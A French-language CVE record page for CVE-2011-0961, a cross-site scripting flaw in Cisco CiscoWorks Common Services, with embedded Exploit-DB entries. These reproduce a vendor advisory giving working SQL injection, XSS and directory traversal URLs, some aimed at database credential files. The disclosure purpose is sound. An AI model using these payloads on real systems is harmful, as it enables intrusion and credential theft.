CVE-2011-0961 : Détail

CVE-2011-0961

Cross-site Scripting
A03-Injection
3.11%V3
Network
2011-05-20
20h00 +00:00
2017-08-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Cross-site scripting (XSS) vulnerability in cwhp/device.center.do in the Help servlet in Cisco CiscoWorks Common Services 3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the device parameter, aka Bug ID CSCto12704.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 35779

Date de publication : 2011-05-17 22h00 +00:00
Auteur : Sense of Security
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/47902/info CiscoWorks Common Services is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and launch other attacks. This issue is being monitored by Cisco Bug ID CSCto12704. CiscoWorks Common Services 3.3 and prior are vulnerable. http://www.example.com/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1
Exploit Database EDB-ID : 17304

Date de publication : 2011-05-17 22h00 +00:00
Auteur : Sense of Security
EDB Vérifié : Yes

Sense of Security - Security Advisory - SOS-11-006 Release Date. 18-May-2011 Last Update. - Vendor Notification Date. 28-Feb-2011 Product. Cisco Unified Operations Manager Common Services Framework Help Servlet Common Services Device Center CiscoWorks Homepage Note: All of the above products are included by default in CuOM. Platform. Microsoft Windows Affected versions. CuOM 8.0 and 8.5 (verified), possibly others. Severity Rating. Medium - Low Impact. Database access, cookie and credential theft, impersonation, loss of confidentiality, local file disclosure, information disclosure. Attack Vector. Remote with authentication Solution Status. Vendor patch (upgrade to CuOM 8.6 as advised by Cisco) CVE reference. CVE-2011-0959 (CSCtn61716) CVE-2011-0960 (CSCtn61716) CVE-2011-0961 (CSCto12704) CVE-2011-0962 (CSCto12712) CVE-2011-0966 (CSCto35577) Details. Cisco Unified Operations Manager (CuOM) is a NMS for voice developed by Cisco Systems. Operations Manager monitors and evaluates the current status of both the IP communications infrastructure and the underlying transport infrastructure in your network. Multiple vulnerabilities have been identified in Cisco Unified Operations Manager and associated products. These vulnerabilities include multiple blind SQL injections, multiple XSS. and a directory traversal vulnerability. 1. Blind SQL injection vulnerabilities that affect CuOM CVE-2011-0960 (CSCtn61716): The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay call: /iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20 delay'0:0:20'--&Extns=&IPs= Additionally, variable ccm of TelePresenceReportAction can trigger a blind SQL injection vulnerability by supplying a single quote: /iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'-- 2. Reflected XSS vulnerabilities that affect CuOM CVE-2011-0959 (CSCtn61716): /iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fb e43447 /iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceC apability=deviceCap /iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c 06d&deviceCapability=deviceCap /iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870 d5&viewname=device.filter&operation=getFilter&dojo.preventCache=129851 8961028 /iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script> 09520eb762c&dojo.preventCache=1298518963370 /iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3b alert(1)//608ddbf972 /iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3ba lert(1)//79877affe89 /iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae 4c /iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7 Reflected XSS vulnerability that affect Common Services Device Center CVE-2011-0962 (CSCto12712): /CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introduc tionhomepage61a8b"%3balert(1)//4e9adfb2987 Reflected XSS vulnerability that affects Common Services Framework Help Servlet CVE-2011-0961 (CSCto12704): /cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251a aad=1 3. Directory traversal vulnerability that affects CiscoWorks Homepage CVE-2011-0966 (CSCto35577): http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini cmfDBA user database info: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.prope rties DB connection info for all databases: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.proper ties Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example. DB password change log: http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\log\dbpwdChange.log Solution. Upgrade to CuOM 8.6. Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and CSCto35577 for information on patches and availability of fixes. Discovered by. Sense of Security Labs. About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the countries largest organisations. Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA T: +61 (0)2 9290 4444 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: info@senseofsecurity.com.au Twitter: @ITsecurityAU The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

Products Mentioned

Configuraton 0

Cisco>>Ciscoworks_common_services >> Version To (including) 3.3

Cisco>>Ciscoworks_common_services >> Version 1.0

Cisco>>Ciscoworks_common_services >> Version 2.2

Cisco>>Ciscoworks_common_services >> Version 3.0

Cisco>>Ciscoworks_common_services >> Version 3.0.3

Cisco>>Ciscoworks_common_services >> Version 3.0.4

Cisco>>Ciscoworks_common_services >> Version 3.0.5

Cisco>>Ciscoworks_common_services >> Version 3.0.6

Cisco>>Ciscoworks_common_services >> Version 3.1

Cisco>>Ciscoworks_common_services >> Version 3.1.1

Cisco>>Ciscoworks_common_services >> Version 3.2

Références

http://www.securityfocus.com/bid/47902
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/17304
Tags : exploit, x_refsource_EXPLOIT-DB